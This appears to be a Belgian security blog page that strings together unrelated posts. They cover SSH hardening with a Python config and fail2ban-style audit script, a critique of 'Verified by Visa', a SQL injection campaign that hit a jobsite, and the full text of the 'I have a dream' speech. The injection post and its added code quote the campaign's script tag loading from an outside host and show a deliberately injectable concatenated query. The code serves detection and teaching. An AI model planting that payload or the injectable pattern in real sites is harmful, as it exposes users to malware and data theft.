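    As an added example (not code from the Internet Storm Center, from OpenSSH or from fail2ban), the following Python block turns the three tips into a check that can be run over an sshd_config, and shows the counting that a fail2ban jail does over the "Failed password" lines in auth.log before it adds a reject rule. The two config fragments, the log lines and the retry limit are constructed; the first-occurrence-wins rule for sshd_config keywords is OpenSSH's own behaviour.

```python
"""Audit an sshd_config against the three tips and count failed logins.

Added example, not code from the Internet Storm Center or from fail2ban.
The config fragments and the log lines below are constructed.
"""
import re
from collections import Counter

# Constructed sshd_config fragments: one weak, one following the tips.
WEAK_CONFIG = """
Port 22
PermitRootLogin yes
PasswordAuthentication yes
"""

HARDENED_CONFIG = """
Port 2222
PermitRootLogin no
PasswordAuthentication no
PubkeyAuthentication yes
"""


def parse_sshd_config(text):
    """Return {keyword_lowercase: value}, ignoring blank lines and comments.
    sshd uses the first occurrence of a keyword, so the first one wins here too."""
    settings = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(None, 1)
        key = parts[0].lower()
        value = parts[1].strip() if len(parts) > 1 else ""
        settings.setdefault(key, value)
    return settings


def audit_sshd_config(text):
    """One finding per tip not followed. Absent keywords are read as the
    OpenSSH defaults for port (22) and password authentication (yes);
    PermitRootLogin is expected to be explicitly 'no'."""
    s = parse_sshd_config(text)
    findings = []
    if s.get("permitrootlogin", "").lower() != "no":
        findings.append("PermitRootLogin should be 'no'")
    if s.get("passwordauthentication", "yes").lower() != "no":
        findings.append("PasswordAuthentication should be 'no' (use keys)")
    if s.get("port", "22") == "22":
        findings.append("Port is 22; move sshd off the default port")
    return findings


# Constructed auth.log lines in the shape OpenSSH writes via syslog.
AUTH_LOG = """\
Dec 20 09:01:02 host sshd[2201]: Failed password for root from 198.51.100.7 port 40112 ssh2
Dec 20 09:01:05 host sshd[2203]: Failed password for root from 198.51.100.7 port 40118 ssh2
Dec 20 09:01:09 host sshd[2205]: Failed password for invalid user admin from 198.51.100.7 port 40124 ssh2
Dec 20 09:01:15 host sshd[2207]: Failed password for invalid user oracle from 198.51.100.7 port 40130 ssh2
Dec 20 09:02:44 host sshd[2210]: Accepted publickey for alice from 192.0.2.10 port 51000 ssh2
Dec 20 09:03:01 host sshd[2212]: Failed password for alice from 192.0.2.10 port 51004 ssh2
"""

FAILED_RE = re.compile(
    r"sshd\[\d+\]: Failed password for (?:invalid user )?\S+ from (\S+) port \d+"
)


def failed_logins_by_ip(log_text):
    """Count 'Failed password' events per source address."""
    return Counter(m.group(1) for m in FAILED_RE.finditer(log_text))


def ips_to_ban(log_text, maxretry=3):
    """Addresses that reached the retry limit: the decision a fail2ban jail
    takes (within its findtime) before it adds a firewall reject rule."""
    return sorted(ip for ip, n in failed_logins_by_ip(log_text).items() if n >= maxretry)


if __name__ == "__main__":
    print("weak:", audit_sshd_config(WEAK_CONFIG))
    print("hardened:", audit_sshd_config(HARDENED_CONFIG))
    print("ban:", ips_to_ban(AUTH_LOG))
```

    Note that a single failure from a legitimate user (alice above) stays well under the limit, which is why the retry count matters more than the mere presence of a failure line.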

  • the "verified by visa" scandal : simply explained for managers and dummies

    the article doesn't say that the whole process is rotten

    it doesn't find exploitable, scriptable holes in the systems

    it only says that when somebody wants to declare a card stolen and wants to get the card back or be able to purchase something, that process is very flawed

    because the only information one has to fill in to get access to the purchasing power of the card

    that is NOT on the card

    is the birthday of the cardholder

    verification should mean something more than that before letting people spend money on stolen cards

  • new sql injection attack and a Belgian jobsite injected


    it mostly attacks ColdFusion and other SQL databases
    it is an SQL error

    in Belgium there are few victims, but one of them is a jobsite
    and a jobsite has your CV
    so it shouldn't be vulnerable at all

    1. Onderwijs

      1 dag geleden – Part-time Docent / Hoofddocent Chemie bij "></title><script src="http://lilupophilupop.com/sl.php"></script><!--Unive in Hasselt (be) 17-11-2011 ...
    2. Healthcare en Life Sciences

      Maria in Overpelt 17-11-2011. 17-11-2011. Full-time Geriater bij "></title><script src="http://lilupophilupop.com/sl.php"></script><!--Maria in Overpelt 17-11-2011 ...
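    As an added example (not code from the affected jobsite or from any report on the campaign), the following Python block puts the flawed query pattern next to the parameterised one, and adds the check a site can run over its own tables after a mass injection: find stored text that carries a script tag loading from a host that is not on the site's allow-list. The schema, the job titles and the allow-list are constructed; the injected string is the one visible in the search results above.

```python
"""Concatenated versus parameterised query, plus a scan of stored rows.

Added example, not code from the affected jobsite. The table, the titles
and the allow-list are constructed; the script tag is the one that shows
up in the search results quoted in the post.
"""
import re
import sqlite3
from urllib.parse import urlparse

INJECTED = '"></title><script src="http://lilupophilupop.com/sl.php"></script><!--'

# Constructed job listings; the second title is what a listing looks like
# once the campaign has appended its script tag to a stored text column.
SAMPLE_JOBS = [
    (1, "Full-time Geriater bij Maria in Overpelt"),
    (2, "Part-time Docent / Hoofddocent Chemie bij " + INJECTED + "Unive in Hasselt"),
    (3, "Analyst at O'Reilly Media (constructed)"),
]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE jobs (id INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany("INSERT INTO jobs VALUES (?, ?)", SAMPLE_JOBS)
    return conn


def search_jobs_concatenated(conn, term):
    """The flawed pattern: user input pasted into the SQL text. A single
    quote in `term` already breaks the statement, which is exactly the
    kind of SQL error the post refers to."""
    sql = "SELECT id, title FROM jobs WHERE title LIKE '%" + term + "%'"
    return conn.execute(sql).fetchall()


def search_jobs_parameterised(conn, term):
    """The fix: the term travels as a bound parameter, never as SQL text."""
    return conn.execute(
        "SELECT id, title FROM jobs WHERE title LIKE ?", ("%" + term + "%",)
    ).fetchall()


def statement_breaks(conn, term):
    """True when the concatenated query fails to parse for this term."""
    try:
        search_jobs_concatenated(conn, term)
        return False
    except sqlite3.OperationalError:
        return True


SCRIPT_SRC_RE = re.compile(r"<script[^>]*\ssrc=[\"']([^\"']+)[\"']", re.IGNORECASE)


def scan_for_injected_scripts(conn, allowed_hosts):
    """(job id, host) for every stored title carrying a script tag that loads
    from a host outside the allow-list."""
    hits = []
    for job_id, title in conn.execute("SELECT id, title FROM jobs"):
        for src in SCRIPT_SRC_RE.findall(title or ""):
            host = urlparse(src).hostname or ""
            if host not in allowed_hosts:
                hits.append((job_id, host))
    return hits


if __name__ == "__main__":
    db = make_db()
    print("quote breaks concatenated query:", statement_breaks(db, "O'Reilly"))
    print("parameterised:", search_jobs_parameterised(db, "O'Reilly"))
    print("injected rows:", scan_for_injected_scripts(db, {"jobsite.example"}))
```

    The scan is a clean-up aid, not a substitute for the parameterised query: it finds rows already written by the campaign, while the bound parameter is what keeps new ones from being written.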


  • #belsecparty documents UN report on e-waste

    just dump it in Africa U N Study on E Waste

  • #belsecparty document I have a dream

    I am happy to join with you today in what will go down in history as the greatest demonstration for freedom in the history of our nation.

    Five score years ago, a great American, in whose symbolic shadow we stand today, signed the Emancipation Proclamation. This momentous decree came as a great beacon light of hope to millions of Negro slaves who had been seared in the flames of withering injustice. It came as a joyous daybreak to end the long night of their captivity.

    But one hundred years later, the Negro still is not free. One hundred years later, the life of the Negro is still sadly crippled by the manacles of segregation and the chains of discrimination. One hundred years later, the Negro lives on a lonely island of poverty in the midst of a vast ocean of material prosperity. One hundred years later, the Negro is still languished in the corners of American society and finds himself an exile in his own land. And so we've come here today to dramatize a shameful condition.

    In a sense we've come to our nation's capital to cash a check. When the architects of our republic wrote the magnificent words of the Constitution and the Declaration of Independence, they were signing a promissory note to which every American was to fall heir. This note was a promise that all men, yes, black men as well as white men, would be guaranteed the "unalienable Rights" of "Life, Liberty and the pursuit of Happiness." It is obvious today that America has defaulted on this promissory note, insofar as her citizens of color are concerned. Instead of honoring this sacred obligation, America has given the Negro people a bad check, a check which has come back marked "insufficient funds."

    But we refuse to believe that the bank of justice is bankrupt. We refuse to believe that there are insufficient funds in the great vaults of opportunity of this nation. And so, we've come to cash this check, a check that will give us upon demand the riches of freedom and the security of justice.

    We have also come to this hallowed spot to remind America of the fierce urgency of Now. This is no time to engage in the luxury of cooling off or to take the tranquilizing drug of gradualism. Now is the time to make real the promises of democracy. Now is the time to rise from the dark and desolate valley of segregation to the sunlit path of racial justice. Now is the time to lift our nation from the quicksands of racial injustice to the solid rock of brotherhood. Now is the time to make justice a reality for all of God's children.

    It would be fatal for the nation to overlook the urgency of the moment. This sweltering summer of the Negro's legitimate discontent will not pass until there is an invigorating autumn of freedom and equality. Nineteen sixty-three is not an end, but a beginning. And those who hope that the Negro needed to blow off steam and will now be content will have a rude awakening if the nation returns to business as usual. And there will be neither rest nor tranquility in America until the Negro is granted his citizenship rights. The whirlwinds of revolt will continue to shake the foundations of our nation until the bright day of justice emerges.

    But there is something that I must say to my people, who stand on the warm threshold which leads into the palace of justice: In the process of gaining our rightful place, we must not be guilty of wrongful deeds. Let us not seek to satisfy our thirst for freedom by drinking from the cup of bitterness and hatred. We must forever conduct our struggle on the high plane of dignity and discipline. We must not allow our creative protest to degenerate into physical violence. Again and again, we must rise to the majestic heights of meeting physical force with soul force.

    The marvelous new militancy which has engulfed the Negro community must not lead us to a distrust of all white people, for many of our white brothers, as evidenced by their presence here today, have come to realize that their destiny is tied up with our destiny. And they have come to realize that their freedom is inextricably bound to our freedom.

    We cannot walk alone.

    And as we walk, we must make the pledge that we shall always march ahead.

    We cannot turn back.

    There are those who are asking the devotees of civil rights, "When will you be satisfied?" We can never be satisfied as long as the Negro is the victim of the unspeakable horrors of police brutality. We can never be satisfied as long as our bodies, heavy with the fatigue of travel, cannot gain lodging in the motels of the highways and the hotels of the cities. *We cannot be satisfied as long as the negro's basic mobility is from a smaller ghetto to a larger one. We can never be satisfied as long as our children are stripped of their self-hood and robbed of their dignity by a sign stating: "For Whites Only."* We cannot be satisfied as long as a Negro in Mississippi cannot vote and a Negro in New York believes he has nothing for which to vote. No, no, we are not satisfied, and we will not be satisfied until "justice rolls down like waters, and righteousness like a mighty stream."¹

    I am not unmindful that some of you have come here out of great trials and tribulations. Some of you have come fresh from narrow jail cells. And some of you have come from areas where your quest -- quest for freedom left you battered by the storms of persecution and staggered by the winds of police brutality. You have been the veterans of creative suffering. Continue to work with the faith that unearned suffering is redemptive. Go back to Mississippi, go back to Alabama, go back to South Carolina, go back to Georgia, go back to Louisiana, go back to the slums and ghettos of our northern cities, knowing that somehow this situation can and will be changed.

    Let us not wallow in the valley of despair, I say to you today, my friends.

    And so even though we face the difficulties of today and tomorrow, I still have a dream. It is a dream deeply rooted in the American dream.

    I have a dream that one day this nation will rise up and live out the true meaning of its creed: "We hold these truths to be self-evident, that all men are created equal."

    I have a dream that one day on the red hills of Georgia, the sons of former slaves and the sons of former slave owners will be able to sit down together at the table of brotherhood.

    I have a dream that one day even the state of Mississippi, a state sweltering with the heat of injustice, sweltering with the heat of oppression, will be transformed into an oasis of freedom and justice.

    I have a dream that my four little children will one day live in a nation where they will not be judged by the color of their skin but by the content of their character.

    I have a dream today!

    I have a dream that one day, down in Alabama, with its vicious racists, with its governor having his lips dripping with the words of "interposition" and "nullification" -- one day right there in Alabama little black boys and black girls will be able to join hands with little white boys and white girls as sisters and brothers.

    I have a dream today!

    I have a dream that one day every valley shall be exalted, and every hill and mountain shall be made low, the rough places will be made plain, and the crooked places will be made straight; "and the glory of the Lord shall be revealed and all flesh shall see it together."²

    This is our hope, and this is the faith that I go back to the South with.

    With this faith, we will be able to hew out of the mountain of despair a stone of hope. With this faith, we will be able to transform the jangling discords of our nation into a beautiful symphony of brotherhood. With this faith, we will be able to work together, to pray together, to struggle together, to go to jail together, to stand up for freedom together, knowing that we will be free one day.

    And this will be the day -- this will be the day when all of God's children will be able to sing with new meaning:

    My country 'tis of thee, sweet land of liberty, of thee I sing.

    Land where my fathers died, land of the Pilgrim's pride,

    From every mountainside, let freedom ring!

    And if America is to be a great nation, this must become true.

    And so let freedom ring from the prodigious hilltops of New Hampshire.

    Let freedom ring from the mighty mountains of New York.

    Let freedom ring from the heightening Alleghenies of

    Let freedom ring from the snow-capped Rockies of Colorado.

    Let freedom ring from the curvaceous slopes of California.

    But not only that:

    Let freedom ring from Stone Mountain of Georgia.

    Let freedom ring from Lookout Mountain of Tennessee.

    Let freedom ring from every hill and molehill of Mississippi.

    From every mountainside, let freedom ring.

    And when this happens, when we allow freedom ring, when we let it ring from every village and every hamlet, from every state and every city, we will be able to speed up that day when all of God's children, black men and white men, Jews and Gentiles, Protestants and Catholics, will be able to join hands and sing in the words of the old Negro spiritual:

    Free at last! Free at last!

    Thank God Almighty, we are free at last!³